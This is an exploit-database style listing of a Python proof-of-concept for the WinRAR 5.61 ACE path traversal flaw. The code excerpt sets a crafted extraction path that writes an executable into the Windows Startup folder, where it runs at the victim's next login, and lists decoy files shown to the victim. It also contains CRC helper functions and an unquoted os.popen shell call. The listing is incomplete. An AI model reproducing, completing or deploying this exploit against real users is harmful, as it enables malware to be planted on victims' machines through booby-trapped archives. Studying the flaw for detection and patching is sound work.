Exploits / Vulnerability Discovered : 2019-02-22 |
Type : local |
Platform : windows
This exploit / vulnerability (WinRAR 5.61 path traversal) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/env python3
import os
import re
import zlib
import binascii
# Settings for the proof-of-concept. The code that consumes them is not part
# of this excerpt, so the notes below restate the author's intent only.
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such as the one shown below.
# Defender note: this path ends in the per-user Startup folder, an autostart
# location, so an archive tool creating an executable there is a useful
# detection signal.
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the archive in WinRAR
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
class AceCRC32:
    """Holder for a CRC state value (an ACE-style CRC-32, judging by the name).

    Only the constructor is visible in this listing.
    """

    def __init__(self, buf=b''):
        """Start the state at zero and fold in *buf* when it is non-empty."""
        # Double underscore: the attribute is name-mangled to _AceCRC32__state.
        self.__state = 0
        if len(buf) == 0:
            return
        # Needs an in-place add operator on this class, which the excerpt
        # does not show.
        self += buf
def get_ace_crc32(filename):
    """Return ace_crc32() of the whole binary content of *filename*.

    ace_crc32 is defined outside this excerpt. The file is read into memory
    in one call.
    """
    with open(filename, 'rb') as handle:
        contents = handle.read()
    return ace_crc32(contents)
def get_right_hdr_crc(filename):
    """Read the 'right_hdr_crc' value that acefile.py reports for *filename*.

    Runs ``acefile.py --headers`` through os.popen, takes the first regex
    result from its output, upper-cases it and returns hex2raw4() of it
    (hex2raw4 is defined outside this excerpt).

    Caveat: *filename* is inserted unquoted into a shell command line, so
    only pass a name you control. An IndexError is raised if the output
    contains no match.
    """
    # This command may differ depending on your Python 3 environment.
    command = 'py -3 acefile.py --headers %s'%(filename)
    header_dump = os.popen(command).read()
    matches = re.findall('right_hdr_crc : 0x(.*?) | struct', header_dump)
    return hex2raw4(matches[0].upper())